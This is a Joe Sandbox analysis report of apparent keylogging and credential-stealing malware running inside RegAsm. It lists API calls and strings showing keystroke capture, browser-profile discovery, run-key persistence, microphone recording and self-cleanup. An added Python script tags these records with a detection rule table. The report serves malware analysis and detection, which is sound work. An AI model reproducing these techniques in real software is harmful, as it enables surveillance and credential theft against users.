• Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID: _strlen
• String ID: : $Se.
• API String ID: 4218353326-4089948878
APIs
• GetLocalTime.KERNEL32(00000000), ref: 0041B509
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: alarm.wav$hYG
• API String ID: 1174141254-2782910960
APIs
  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
• CloseHandle.KERNEL32(?), ref: 0040B0B4
• UnhookWindowsHookEx.USER32 ref: 0040B0C7
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
Strings
Memory Dump Source
• Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
                                                                        APIs
                                                                          • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                                        • DeleteCriticalSection.KERNEL32(00471090,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                                                                        • _free.LIBCMT ref: 00449ACC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalSection$DeleteEnter_free
                                                                        • String ID: (T
                                                                        • API String ID: 1836352639-1256210051
                                                                        • Opcode ID: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
                                                                        • Instruction ID: d8668749b8f053f3b87a5db4b07a71174a174bb0d30b2be9e7ca2d93a8738622
                                                                        • Opcode Fuzzy Hash: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
                                                                        • Instruction Fuzzy Hash: 491161315002149FE720DFA9D846B5D73B0FB04315F10455AE959AB2E6CBBCEC82DB0D
                                                                        APIs
                                                                        • waveInPrepareHeader.WINMM(005291F8,00000020,?), ref: 00401849
                                                                        • waveInAddBuffer.WINMM(005291F8,00000020), ref: 0040185F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wave$BufferHeaderPrepare
                                                                        • String ID: XMG
                                                                        • API String ID: 2315374483-813777761
                                                                        • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                        • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                        APIs
                                                                        • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocaleValid
                                                                        • String ID: IsValidLocaleName$JD
                                                                        • API String ID: 1901932003-2234456777
                                                                        • Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                                        • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                                        • Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                                        • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                        • API String ID: 1174141254-4188645398
                                                                        • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                                                        • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                        • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                                                        • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                        • API String ID: 1174141254-2800177040
                                                                        • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                                                        • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                                        • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                                                        • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                                        • API String ID: 1174141254-1629609700
                                                                        • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                                                        • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                                        • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                                                        • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                                        APIs
                                                                        • GetKeyState.USER32(00000011), ref: 0040B64B
                                                                          • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                                          • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                          • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                                                                          • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                                          • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                                                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                        • String ID: [AltL]$[AltR]
                                                                        • API String ID: 2738857842-2658077756
                                                                        • Opcode ID: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                                                                        • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                                        • Opcode Fuzzy Hash: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                                                                        • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                                        APIs
                                                                        • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                        • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: uD
                                                                        • API String ID: 0-2547262877
                                                                        • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                        • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                                        • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                        • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExecuteShell
                                                                        • String ID: !D@$open
                                                                        • API String ID: 587946157-1586967515
                                                                        • Opcode ID: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                                        • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                                        • Opcode Fuzzy Hash: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                                        • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                                        APIs
                                                                        • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: State
                                                                        • String ID: [CtrlL]$[CtrlR]
                                                                        • API String ID: 1649606143-2446555240
                                                                        • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                                        • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                                        • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                                        • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                                        APIs
                                                                          • Part of subcall function 00449A5C: DeleteCriticalSection.KERNEL32(00471090,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                                                                          • Part of subcall function 00449A5C: _free.LIBCMT ref: 00449ACC
                                                                          • Part of subcall function 00449AFC: _free.LIBCMT ref: 00449B1E
                                                                        • DeleteCriticalSection.KERNEL32(0054E808), ref: 0043C1F1
                                                                        • _free.LIBCMT ref: 0043C205
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$CriticalDeleteSection
                                                                        • String ID: (T
                                                                        • API String ID: 1906768660-1256210051
                                                                        • Opcode ID: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
                                                                        • Instruction ID: 43a050214315618beeb9c81765b0605937ca417edd614e55d144c525631042cd
                                                                        • Opcode Fuzzy Hash: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
                                                                        • Instruction Fuzzy Hash: 69E04F329145108FEB717F6AFD8595A73E49B4D325B11082FFC0DA316ACA6DAC809B8D
                                                                        APIs
                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer__onexit
                                                                        • String ID: ,kG$0kG
                                                                        • API String ID: 1881088180-2015055088
                                                                        • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                        • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                                        • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                        • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                                        APIs
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                        • API String ID: 2654517830-1051519024
                                                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                        • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                        • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
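The function records above (imported APIs plus the strings cross-referenced from each function) are the raw material behind the report's signature lines: GetKeyState/ToUnicodeEx with the [AltL]/[CtrlL] markers is the keylogger, PathFileExistsW against the Chrome, Edge and Opera profile paths is browser credential discovery, and the Policies\Explorer\Run string is the run-key persistence. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses a few of these records (copied from above into a constructed inline sample, with the fuzzy-hash and IDA-plugin lines omitted), tags each function with a capability label, decodes the GetKeyState virtual-key argument (0x10 VK_SHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU), and splits the .sdmp name into process index, base and protection. The rule table, the capability labels and the assumed field layout of the .sdmp name are the example's own assumptions; the base and the 0xE process index are checked against the record's Offset and the _14_ in the snapshot file name, but reading the fifth field as a PAGE_* protection is an inference.

```python
"""Parse this report's per-function records (APIs / Strings / Memory Dump Source /
Similarity) and tag each function with a capability. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# Constructed sample: three records copied from the report, whitespace trimmed,
# fuzzy-hash and IDA-plugin lines omitted.
SAMPLE = r"""
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: UserProfile$\AppData\Local\Google\Chrome\
APIs
• GetKeyState.USER32(00000011), ref: 0040B64B
  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: [AltL]$[AltR]
APIs
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# Name.MODULE(args) or bare Name.MODULE; also hits "Part of subcall ...: Name.MODULE".
API_RE = re.compile(r"([A-Za-z_]\w*)\.([A-Z0-9]+)(?:\(([^)]*)\))?")
XREF_RE = re.compile(r"^•\s*(.*?),\s*xrefs?:\s*[0-9A-Fa-f]+$")
# Assumed rule table: (label, APIs that must all be present, any-of string markers).
RULES = [
    ("keylogging", {"GetKeyState", "ToUnicodeEx"}, ()),
    ("browser-profile discovery", {"PathFileExistsW"},
     (r"\Google\Chrome", r"\Microsoft\Edge", r"\Opera Software")),
    ("registry run-key persistence", set(), (r"Policies\Explorer\Run",)),
    ("microphone capture", {"waveInPrepareHeader", "waveInAddBuffer"}, ()),
    ("artifact cleanup", {"DeleteFileW", "RemoveDirectoryW"}, ()),
]
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}   # GetKeyState arguments
PAGE = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
        0x40: "PAGE_EXECUTE_READWRITE"}

@dataclass
class FuncRecord:
    apis: set = field(default_factory=set)        # own and callee ("subcall") API names
    api_args: dict = field(default_factory=dict)  # name -> list of argument lists
    strings: list = field(default_factory=list)
    dump: str = ""

def parse_records(text):
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":                    # every record opens with "APIs"
                rec = FuncRecord()
                records.append(rec)
            section = line
            continue
        if rec is None:
            continue
        if section == "APIs" and (m := API_RE.search(line)):
            name, args = m.group(1), m.group(3)
            rec.apis.add(name)
            rec.api_args.setdefault(name, []).append(args.split(",") if args else [])
        elif section == "Strings" and (m := XREF_RE.match(line)):
            if m.group(1) not in rec.strings:
                rec.strings.append(m.group(1))
        elif section == "Memory Dump Source" and line.startswith("• Source File:"):
            rec.dump = line.split("Source File:", 1)[1].split(",")[0].strip()
        elif section == "Similarity" and line.startswith("• String ID:"):
            for s in line.split("String ID:", 1)[1].strip().split("$"):
                if s and s not in rec.strings:
                    rec.strings.append(s)
    return records

def describe_dump(name):
    # Assumed .sdmp layout: <proc index>.<pass>.<timestamp>.<base>.<protect>...; the
    # PAGE_* reading of field 5 is this example's inference, not stated by the report.
    f = name.split(".")
    if len(f) < 5:
        return {}
    prot = int(f[4], 16)
    return {"process_index": int(f[0], 16), "base": int(f[3], 16),
            "protect": PAGE.get(prot, hex(prot))}

def analyze(text):
    out = []
    for rec in parse_records(text):
        caps = [label for label, apis, markers in RULES if apis <= rec.apis
                and (not markers or any(m in s for m in markers for s in rec.strings))]
        keys = [VK.get(int(a[0], 16), a[0]) for a in rec.api_args.get("GetKeyState", [])
                if a and re.fullmatch(r"[0-9A-Fa-f]+", a[0])]
        out.append({"apis": sorted(rec.apis), "strings": rec.strings, "capabilities": caps,
                    "getkeystate_vk": keys, "dump": describe_dump(rec.dump)})
    return out

if __name__ == "__main__":
    for i, r in enumerate(analyze(SAMPLE), 1):
        print(i, r["capabilities"], r["getkeystate_vk"], r["dump"])
```

Two caveats when running this over the full record list. First, the "Part of subcall function" lines belong to callees, so an API counted for a function may live one call deeper; the keylogging rule relies on that (ToUnicodeEx is only reached through the subcall at 0040A3E0). Second, the strings Joe Sandbox attaches to a record are whatever that function cross-references, not necessarily what the decoded argument means: the two GetKeyState records above pass 0x11 (VK_CONTROL) and 0x12 (VK_MENU, the Alt key) while carrying the [AltL]/[AltR] and [CtrlL]/[CtrlR] strings respectively, so decode the argument rather than trusting the string pairing.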
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteDirectoryFileRemove
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 3325800564-4028850238
                                                                        • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                                        • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                                        • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                                        • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                                        APIs
                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1872346434-4028850238
                                                                        • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                        • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                                        • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                        • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
